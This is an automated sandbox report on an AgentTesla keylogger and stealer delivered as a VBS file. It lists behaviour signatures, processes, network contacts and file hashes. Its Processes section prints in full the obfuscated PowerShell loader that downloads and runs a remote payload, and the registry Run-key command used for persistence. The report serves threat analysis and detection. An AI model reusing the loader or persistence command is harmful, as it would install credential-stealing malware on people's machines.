Malware Analysis Report

2024-11-30 07:20

Sample ID 240603-hj7k5sgd53
Target Doc09876545678.vbs
SHA256 af46cfe7a8d2968846d0ae4ea5b3b36f91f37cf4195f781155e95c4e20696f85
Tags
agenttesla keylogger persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

af46cfe7a8d2968846d0ae4ea5b3b36f91f37cf4195f781155e95c4e20696f85

Threat Level: Known bad

The file Doc09876545678.vbs was found to be: Known bad.

Malicious Activity Summary

agenttesla keylogger persistence spyware stealer trojan

AgentTesla

Blocklisted process makes network request

Checks computer location settings

Looks up external IP address via web service

Adds Run key to start application

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Modifies registry key

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-03 06:47

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-03 06:47

Reported

2024-06-03 06:49

Platform

win7-20240221-en

Max time kernel

144s

Max time network

149s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Doc09876545678.vbs"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cuichunchulli = "%Frbiddene% -w 1 $Gylpet=(Get-ItemProperty -Path 'HKCU:\\Jalopy\\').nyansat;%Frbiddene% ($Gylpet)" | C:\Windows\SysWOW64\reg.exe | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | api.ipify.org | N/A | N/A
N/A | api.ipify.org | N/A | N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 2916 set thread context of 896 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1948 wrote to memory of 2624 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1948 wrote to memory of 2624 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1948 wrote to memory of 2624 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 2680 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 2624 wrote to memory of 2680 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 2624 wrote to memory of 2680 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 2624 wrote to memory of 2916 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 2916 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 2916 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 2916 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 1048 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 2916 wrote to memory of 1048 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 2916 wrote to memory of 1048 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 2916 wrote to memory of 1048 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 2916 wrote to memory of 896 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 2916 wrote to memory of 896 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 2916 wrote to memory of 896 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 2916 wrote to memory of 896 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 2916 wrote to memory of 896 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 2916 wrote to memory of 896 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 896 wrote to memory of 504 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Windows\SysWOW64\cmd.exe
PID 896 wrote to memory of 504 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Windows\SysWOW64\cmd.exe
PID 896 wrote to memory of 504 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Windows\SysWOW64\cmd.exe
PID 896 wrote to memory of 504 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Windows\SysWOW64\cmd.exe
PID 504 wrote to memory of 336 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 504 wrote to memory of 336 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 504 wrote to memory of 336 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 504 wrote to memory of 336 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Doc09876545678.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hjertelse = 1;Function Desertr($Tocylindret){$Designerendes=$Tocylindret.Length-$Hjertelse;$Bortledt='Substring';For( $Isotherm=5;$Isotherm -lt $Designerendes;$Isotherm+=6){$fugtplettede+=$Tocylindret.$Bortledt.Invoke( $Isotherm, $Hjertelse);}$fugtplettede;}function Unsabbatical129($Udskilt){ . ($Genkomsters) ($Udskilt);}$Trolly=Desertr 'ForsyMm,taso,yingzKammeiCyclilGs,gil.jemgaPseud/Pickp5Assu,.Rankl0Paraf Oplsn(AlympWScen,iL,vprnE.ethdChoyaoMaskew Po.ysande .npiNVi ioTEnkel Nonge1Reek.0Planl.Bjank0Karai;Subje AnonW LactiRefednAnten6Leksi4 Ofri;Dokto ValexCirk 6Ly ke4Dogfa;As.ro OrfevrTilstv Ha t:Isola1Geode2Newfo1Smaab. Prio0 Judg) Pter Bagk,GSegmeeHandocInhabkKol.noI,dra/Conf.2Aller0.dsty1Velse0Deltr0Penu,1ronns0 wart1Phasm S.bflFFe toiFordrrG,bene BrudfDu.aloNederxSt,af/Quelq1Indby2Hmorr1Tjekk.Bruge0Ud os ';$Reexcavated=Desertr 'D verUBackss dnereKrftsrRe,om-NedtrAIthe g AzoteS.rinnExscitSquea ';$Anoesis=Desertr 'kommuhRadictDyreht vranp AktisZan i: Subl/Danse/ St,gdAss.rrSpillhAppl hGanglmCherma Reder BakskOlympeE,dertSygemiBivuanNonregErhve. 
TaagcKonteoOatlimReimp/StavbwLail.pUncur-Vrdi.aSubstdSla.bmAnretiHuskenFlydt/ SeksTE,cavrBe mer QuadeBra,rsAlmsdn Sulfo S lirG,ldee InmesUddre.Diartq OverxLordsd Tube ';$Delves=Desertr 'Soare>Roama ';$Genkomsters=Desertr 'AntehiNannaeDiploxEnsur ';$Alterbrds='Mameyes';$Impartable = Desertr ' Ne,veTetracOmgnghterraoCheck Stri %Unp rafo.ospAndenpPigm.dFj,rla omeot,aaneaEntra%Pal.e\,ymphpFacturKosmoeFremsf,utopu N,nvlAday gHaar.eRiddenOphavcIncreymargi.St alSmot ltD apho Blad Udtry&a rid& Lite BrahmeRag fcPicothteg.voSttte Pard t A,am ';Unsabbatical129 (Desertr ',etry$bibligFinanlSn ftoHjlpeb SperaShantl Dom.:EnwomSAviseaIgenbm SledlD aniiLactonB.kisgHalsesHade,mGenner unprkSpi.seSknsvtStagesBackp2Sludd0Inter3Divor= Foto(KlippcTutelmkartod rila .luff/Fr,gmc gens Subje$LingeICrocumToll.pBiaswaScenarin eftStankaMetodb DisalPl wme ,kul)B umb ');Unsabbatical129 (Desertr 'ledn.$PrivagLaanelSt,ado Eut.b PedaaMerkalPlasm: AutoIRibesrDelina Bre.sPreaccBrutti EllibSkrt.lBillieSejern ,ride ormssMoetssToril=Retsf$GybinA I brn B.llo,oupieDrif.sSphenipopuls,orku.AflgnsUnemipDecemlSynbai.efortPilla(Porg $NulliD ZeugethawilDatervAccreeAft.nsKjest)Skraa ');$Anoesis=$Irascibleness[0];$Indues= (Desertr '.esou$LysbagS,andlTr,laoCollobOpposa S del Srhf:Indd,B xotioActinsHumane Contr Hottu ProspCr misShlem=NyansNre,uleelefaw Rumf-IfeckO Fluib,rienj.rysteBydelcDeifit Gaff E,bndSfattiyAfgrdsC,olit,plineSalsumSamme. 
KemiN NitrePe,datB bec.Spio.W AutoeEkstrb eliC amlilBogstib,mnde OmslnIn,olt');$Indues+=$Samlingsmrkets203[1];Unsabbatical129 ($Indues);Unsabbatical129 (Desertr ' A ti$PentaBWo,teoSitresKvadreUmtterBilleuW,ewtp .oopsfremt.FritnHVivareHema aUdflidCapsoeAm.ulrFrangsLoglo[ rnit$ Con,RMiegyeSy,ame alcix Thorc ItinafalsivFolkeaMul tt,ontreH,rdydGuava],hala=Unins$FleerT Unecr Eup.o.odgilMo,etlSvendytrefa ');$Behrigt=Desertr 'Whisk$ ordwBCulicoKlninsA prveHreaprIrrevuLamelpElusosZebor.ChervDNiketoB,otbw.isimnFor,rlQuinooKro,pa,sseld aarrF mariiAg.anlSpidsestaph(Pdago$UnadjASkvalnIntero PyroeDe,ims ishmiOutcrsPodet,Snavs$ Sturb HistuLandbkU.drys,ifoneStrann,tymoeSplitdImitaeDrop.r DupedCoop e.aboul DroieAvlsbnUncome Cata)opbrd ';$buksenederdelene=$Samlingsmrkets203[0];Unsabbatical129 (Desertr 'Oph,h$HomodgHessil ForkoProvebafstvaDelicl Kern:S.ltaBPoitrrVapori ntiub UnpreSwellr AdsciSignieLoddes Tred=Belgn(KliniTK ngwe Endos Mandtdiges-Honn PMerlraApprotSnip,hF,ste Weani$r.binbDyrehuEyepokPonjasPortieToxicnAkkore DaildCongreMesiorLargodBiffieLeeuwlAsc.peLoga n KonfeCyclo) Kaet ');while (!$Briberies) {Unsabbatical129 (Desertr 'Grina$CaricgGalvalUnproo SatibIn,egaUnderlFemci: roteAn,tviuBerksr SylliLittecTru huPartilordspa AalbtKemi eFustadBaran=Udlyd$Fotogt IncorB,unduPreute Lepi ') ;Unsabbatical129 $Behrigt;Unsabbatical129 (Desertr ' UnciSTiltrtTiradaMaddarFanattStads-LedniSTaalelSnugsebaseseDiscopTeleo Homos4Basal ');Unsabbatical129 (Desertr 'Aleci$ Dripg Blaal OutfoTra,sbcri.ia T atlActin:IntonBT,intrMassei ForlbVenteeOm,ibrHarani OutbePlexosfritn=Aquad(Japa.TMalapeOmdbns St.ttA.kac-PartiPSubinaKortetEks rhSagsa arc$Po itbsv jsuSal akBrndesDokumeVlgernNapoleBlokkdFor.ke,ilfar DatadBeacoe Gau l Ung e Forkn GalaeYalen) Hav, ') ;Unsabbatical129 (Desertr 'Simne$I,recg sch lLabrio VensbPainta,nterl T,al: D.bbFNovemrSnuggiBomlrt Erhvu PolyrWebaseEc lesSaaletSm abeGra ig ConveTaktlrOxyne=,alse$Nudelg,ongllToparoAc epbOrangaBramml Peri: 
Kon.sGanoilForbuvKu,lepAnlbseSubulnHazelg,afete San nNee ceUndef+Al,it+.arbe% Ma,v$Gavs I epurDemonaNaulusWhitecconuziContebMispalManipe Dy vnTjenee BegisH maps ara.ThumpcNierno PussukamganhasidtForbu ') ;$Anoesis=$Irascibleness[$Frituresteger];}$Lidelsen=288008;$Unthrid=29506;Unsabbatical129 (Desertr ',ncol$VoltagA gumlMis.poOver.bRi geaSonoglSpare: SkufEI,mats Com s NichenonaprNondiaReolp Emend=Hindu .gsjGPolygeIngratLslad-F.rspCDrankoForskn Br.vtE,treeCo chnApla.tIsln. Inddm$OversbBudgeu A.ankGr,nds Sunde GallnSma.feUnclod pr,ieSo bor ArbadCivileInddalNonareVingenChuffe Fa,t ');Unsabbatical129 (Desertr 'Rebor$ FdesgwainrlDeliboUncocb.estiaSampllN.ska:PalpelCuscukFacepk.revee,affisOpgret OverrB udeuGallikSemi t apomuDkketrDi,cosFinla Hype =Sitco Kalor[FondsS FedtyMiljbs bukstAngele.oamemCnido.SacroCTjavso oentnGallivyppereLacqur Cat.tKaoli]Pegep:Entop:Zygo.FMangerDishooImambmTopv BkjoleaSt,ndsGrundeTempo6Ox,la4TopplSf,rlatKu,surSolidiGrilnnZygotgSosi.(Hexos$Gr ssEGodsesAlu isReexpe .ogdrGoldbaSkygg)Stem, ');Unsabbatical129 (Desertr 'Dol.a$.ranegKatall UdsuoKumu.bLandfa Fed,lCito.: T,gnu,erienGuzerdFodslrHepate BerbaK,besmTimeltNephe Ultra=Filig Diplo[VierkSgigmay Delis BandtAnakoe GynimEks r. SaccTMyopoe Es.rx Tr btKdsa,.AsterE Ell n For.c RegioT,keldH,rmoiSpectnKhedagGr nd]Dicoe:nitte:SummeAsel hS .ncoC I.poI.onkuIoddit.AkeraGmidjeeSk.pttAss iSFo slt .lvor .agsiCamern UrbagAdloe(Sh tg$ tearlNonobk FrdikZeucteIntr.sIn botBacterBothyuhiphukBr.actBuncouOutplrAccepsdicti)Polyd ');Unsabbatical129 (Desertr 'Fors.$Deceng Obsel UfuloGaestbConjuaSkriblUdpre: B,naNBe ona DinnvG uffiB inkgSam,eadcbalt ngdeiEnke.oUnoxinLeninsDisa.sSuperkoddfeoSmintl TrileRam,l=Ridde$Hel.euNonexn MejedBinderKon.oeFer.iaStengm Kry,tcabre.con esHak iuFagkrb GrnssUdplatS,nderKenmaiVillinThor,g Tils(.rbej$Tron LR,foriRoutidPot,neVag,sl KasssAfdryeDe ornH.lde,Tun c$RekurU Le.anKro,otBef yhSpytsr.edali,acetdSta y)Snekk ');Unsabbatical129 $Navigationsskole;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\prefulgency.Sto && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hjertelse = 1;Function Desertr($Tocylindret){$Designerendes=$Tocylindret.Length-$Hjertelse;$Bortledt='Substring';For( $Isotherm=5;$Isotherm -lt $Designerendes;$Isotherm+=6){$fugtplettede+=$Tocylindret.$Bortledt.Invoke( $Isotherm, $Hjertelse);}$fugtplettede;}function Unsabbatical129($Udskilt){ . ($Genkomsters) ($Udskilt);}$Trolly=Desertr 'ForsyMm,taso,yingzKammeiCyclilGs,gil.jemgaPseud/Pickp5Assu,.Rankl0Paraf Oplsn(AlympWScen,iL,vprnE.ethdChoyaoMaskew Po.ysande .npiNVi ioTEnkel Nonge1Reek.0Planl.Bjank0Karai;Subje AnonW LactiRefednAnten6Leksi4 Ofri;Dokto ValexCirk 6Ly ke4Dogfa;As.ro OrfevrTilstv Ha t:Isola1Geode2Newfo1Smaab. Prio0 Judg) Pter Bagk,GSegmeeHandocInhabkKol.noI,dra/Conf.2Aller0.dsty1Velse0Deltr0Penu,1ronns0 wart1Phasm S.bflFFe toiFordrrG,bene BrudfDu.aloNederxSt,af/Quelq1Indby2Hmorr1Tjekk.Bruge0Ud os ';$Reexcavated=Desertr 'D verUBackss dnereKrftsrRe,om-NedtrAIthe g AzoteS.rinnExscitSquea ';$Anoesis=Desertr 'kommuhRadictDyreht vranp AktisZan i: Subl/Danse/ St,gdAss.rrSpillhAppl hGanglmCherma Reder BakskOlympeE,dertSygemiBivuanNonregErhve. 
TaagcKonteoOatlimReimp/StavbwLail.pUncur-Vrdi.aSubstdSla.bmAnretiHuskenFlydt/ SeksTE,cavrBe mer QuadeBra,rsAlmsdn Sulfo S lirG,ldee InmesUddre.Diartq OverxLordsd Tube ';$Delves=Desertr 'Soare>Roama ';$Genkomsters=Desertr 'AntehiNannaeDiploxEnsur ';$Alterbrds='Mameyes';$Impartable = Desertr ' Ne,veTetracOmgnghterraoCheck Stri %Unp rafo.ospAndenpPigm.dFj,rla omeot,aaneaEntra%Pal.e\,ymphpFacturKosmoeFremsf,utopu N,nvlAday gHaar.eRiddenOphavcIncreymargi.St alSmot ltD apho Blad Udtry&a rid& Lite BrahmeRag fcPicothteg.voSttte Pard t A,am ';Unsabbatical129 (Desertr ',etry$bibligFinanlSn ftoHjlpeb SperaShantl Dom.:EnwomSAviseaIgenbm SledlD aniiLactonB.kisgHalsesHade,mGenner unprkSpi.seSknsvtStagesBackp2Sludd0Inter3Divor= Foto(KlippcTutelmkartod rila .luff/Fr,gmc gens Subje$LingeICrocumToll.pBiaswaScenarin eftStankaMetodb DisalPl wme ,kul)B umb ');Unsabbatical129 (Desertr 'ledn.$PrivagLaanelSt,ado Eut.b PedaaMerkalPlasm: AutoIRibesrDelina Bre.sPreaccBrutti EllibSkrt.lBillieSejern ,ride ormssMoetssToril=Retsf$GybinA I brn B.llo,oupieDrif.sSphenipopuls,orku.AflgnsUnemipDecemlSynbai.efortPilla(Porg $NulliD ZeugethawilDatervAccreeAft.nsKjest)Skraa ');$Anoesis=$Irascibleness[0];$Indues= (Desertr '.esou$LysbagS,andlTr,laoCollobOpposa S del Srhf:Indd,B xotioActinsHumane Contr Hottu ProspCr misShlem=NyansNre,uleelefaw Rumf-IfeckO Fluib,rienj.rysteBydelcDeifit Gaff E,bndSfattiyAfgrdsC,olit,plineSalsumSamme. 
KemiN NitrePe,datB bec.Spio.W AutoeEkstrb eliC amlilBogstib,mnde OmslnIn,olt');$Indues+=$Samlingsmrkets203[1];Unsabbatical129 ($Indues);Unsabbatical129 (Desertr ' A ti$PentaBWo,teoSitresKvadreUmtterBilleuW,ewtp .oopsfremt.FritnHVivareHema aUdflidCapsoeAm.ulrFrangsLoglo[ rnit$ Con,RMiegyeSy,ame alcix Thorc ItinafalsivFolkeaMul tt,ontreH,rdydGuava],hala=Unins$FleerT Unecr Eup.o.odgilMo,etlSvendytrefa ');$Behrigt=Desertr 'Whisk$ ordwBCulicoKlninsA prveHreaprIrrevuLamelpElusosZebor.ChervDNiketoB,otbw.isimnFor,rlQuinooKro,pa,sseld aarrF mariiAg.anlSpidsestaph(Pdago$UnadjASkvalnIntero PyroeDe,ims ishmiOutcrsPodet,Snavs$ Sturb HistuLandbkU.drys,ifoneStrann,tymoeSplitdImitaeDrop.r DupedCoop e.aboul DroieAvlsbnUncome Cata)opbrd ';$buksenederdelene=$Samlingsmrkets203[0];Unsabbatical129 (Desertr 'Oph,h$HomodgHessil ForkoProvebafstvaDelicl Kern:S.ltaBPoitrrVapori ntiub UnpreSwellr AdsciSignieLoddes Tred=Belgn(KliniTK ngwe Endos Mandtdiges-Honn PMerlraApprotSnip,hF,ste Weani$r.binbDyrehuEyepokPonjasPortieToxicnAkkore DaildCongreMesiorLargodBiffieLeeuwlAsc.peLoga n KonfeCyclo) Kaet ');while (!$Briberies) {Unsabbatical129 (Desertr 'Grina$CaricgGalvalUnproo SatibIn,egaUnderlFemci: roteAn,tviuBerksr SylliLittecTru huPartilordspa AalbtKemi eFustadBaran=Udlyd$Fotogt IncorB,unduPreute Lepi ') ;Unsabbatical129 $Behrigt;Unsabbatical129 (Desertr ' UnciSTiltrtTiradaMaddarFanattStads-LedniSTaalelSnugsebaseseDiscopTeleo Homos4Basal ');Unsabbatical129 (Desertr 'Aleci$ Dripg Blaal OutfoTra,sbcri.ia T atlActin:IntonBT,intrMassei ForlbVenteeOm,ibrHarani OutbePlexosfritn=Aquad(Japa.TMalapeOmdbns St.ttA.kac-PartiPSubinaKortetEks rhSagsa arc$Po itbsv jsuSal akBrndesDokumeVlgernNapoleBlokkdFor.ke,ilfar DatadBeacoe Gau l Ung e Forkn GalaeYalen) Hav, ') ;Unsabbatical129 (Desertr 'Simne$I,recg sch lLabrio VensbPainta,nterl T,al: D.bbFNovemrSnuggiBomlrt Erhvu PolyrWebaseEc lesSaaletSm abeGra ig ConveTaktlrOxyne=,alse$Nudelg,ongllToparoAc epbOrangaBramml Peri: 
Kon.sGanoilForbuvKu,lepAnlbseSubulnHazelg,afete San nNee ceUndef+Al,it+.arbe% Ma,v$Gavs I epurDemonaNaulusWhitecconuziContebMispalManipe Dy vnTjenee BegisH maps ara.ThumpcNierno PussukamganhasidtForbu ') ;$Anoesis=$Irascibleness[$Frituresteger];}$Lidelsen=288008;$Unthrid=29506;Unsabbatical129 (Desertr ',ncol$VoltagA gumlMis.poOver.bRi geaSonoglSpare: SkufEI,mats Com s NichenonaprNondiaReolp Emend=Hindu .gsjGPolygeIngratLslad-F.rspCDrankoForskn Br.vtE,treeCo chnApla.tIsln. Inddm$OversbBudgeu A.ankGr,nds Sunde GallnSma.feUnclod pr,ieSo bor ArbadCivileInddalNonareVingenChuffe Fa,t ');Unsabbatical129 (Desertr 'Rebor$ FdesgwainrlDeliboUncocb.estiaSampllN.ska:PalpelCuscukFacepk.revee,affisOpgret OverrB udeuGallikSemi t apomuDkketrDi,cosFinla Hype =Sitco Kalor[FondsS FedtyMiljbs bukstAngele.oamemCnido.SacroCTjavso oentnGallivyppereLacqur Cat.tKaoli]Pegep:Entop:Zygo.FMangerDishooImambmTopv BkjoleaSt,ndsGrundeTempo6Ox,la4TopplSf,rlatKu,surSolidiGrilnnZygotgSosi.(Hexos$Gr ssEGodsesAlu isReexpe .ogdrGoldbaSkygg)Stem, ');Unsabbatical129 (Desertr 'Dol.a$.ranegKatall UdsuoKumu.bLandfa Fed,lCito.: T,gnu,erienGuzerdFodslrHepate BerbaK,besmTimeltNephe Ultra=Filig Diplo[VierkSgigmay Delis BandtAnakoe GynimEks r. SaccTMyopoe Es.rx Tr btKdsa,.AsterE Ell n For.c RegioT,keldH,rmoiSpectnKhedagGr nd]Dicoe:nitte:SummeAsel hS .ncoC I.poI.onkuIoddit.AkeraGmidjeeSk.pttAss iSFo slt .lvor .agsiCamern UrbagAdloe(Sh tg$ tearlNonobk FrdikZeucteIntr.sIn botBacterBothyuhiphukBr.actBuncouOutplrAccepsdicti)Polyd ');Unsabbatical129 (Desertr 'Fors.$Deceng Obsel UfuloGaestbConjuaSkriblUdpre: B,naNBe ona DinnvG uffiB inkgSam,eadcbalt ngdeiEnke.oUnoxinLeninsDisa.sSuperkoddfeoSmintl TrileRam,l=Ridde$Hel.euNonexn MejedBinderKon.oeFer.iaStengm Kry,tcabre.con esHak iuFagkrb GrnssUdplatS,nderKenmaiVillinThor,g Tils(.rbej$Tron LR,foriRoutidPot,neVag,sl KasssAfdryeDe ornH.lde,Tun c$RekurU Le.anKro,otBef yhSpytsr.edali,acetdSta y)Snekk ');Unsabbatical129 $Navigationsskole;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\prefulgency.Sto && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Cuichunchulli" /t REG_EXPAND_SZ /d "%Frbiddene% -w 1 $Gylpet=(Get-ItemProperty -Path 'HKCU:\Jalopy\').nyansat;%Frbiddene% ($Gylpet)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Cuichunchulli" /t REG_EXPAND_SZ /d "%Frbiddene% -w 1 $Gylpet=(Get-ItemProperty -Path 'HKCU:\Jalopy\').nyansat;%Frbiddene% ($Gylpet)"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | drhhmarketing.com | udp
US | 104.21.39.61:443 | drhhmarketing.com | tcp
US | 8.8.8.8:53 | apps.identrust.com | udp
NL | 23.63.101.153:80 | apps.identrust.com | tcp
US | 104.21.39.61:443 | drhhmarketing.com | tcp
US | 8.8.8.8:53 | x2.c.lencr.org | udp
BE | 23.55.97.11:80 | x2.c.lencr.org | tcp
US | 8.8.8.8:53 | api.ipify.org | udp
US | 172.67.74.152:443 | api.ipify.org | tcp

Files

memory/2624-4-0x000007FEF573E000-0x000007FEF573F000-memory.dmp

memory/2624-5-0x000000001B560000-0x000000001B842000-memory.dmp

memory/2624-6-0x0000000001F70000-0x0000000001F78000-memory.dmp

memory/2624-10-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

memory/2624-9-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

memory/2624-8-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

memory/2624-7-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab55D0.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar56EF.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c176f8310fd6f4f73514c6e25f82a8e1
SHA1 b5c9c9951317a1809c6be0aa2f9b3a8d8bd98a7d
SHA256 7c098e17959b49c5540d0bbad63d2757f1909d03cc93a3c2f6a9e1c26d1a3fca
SHA512 87f789001f5a8948b1c5cf9a0c58b86ea9a5045954d4671864f01f4e3475e2b65404856bebece3183a4e3f4688309b9c5fcb1b18df716d3311ec041b72667231

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BVTU59DVDGB45I7ZNNXF.temp

MD5 d6b2a25f22ff4b4b3b34af1dbe169069
SHA1 aef18d8eb963a2a9c145632dc66f948377ebd6df
SHA256 f0000a576d7df2a890ea6a62dd1a38fea8e5f9fac7b49e2220c61304f14e1043
SHA512 74e620c64864975ec1fbfd7f58b4fe28c0aa10f40037ea574eff155cf94558c1d755429df82660acc25d48d4f5da12bd9fa91f874df8daf7ee199421f2359665

C:\Users\Admin\AppData\Roaming\prefulgency.Sto

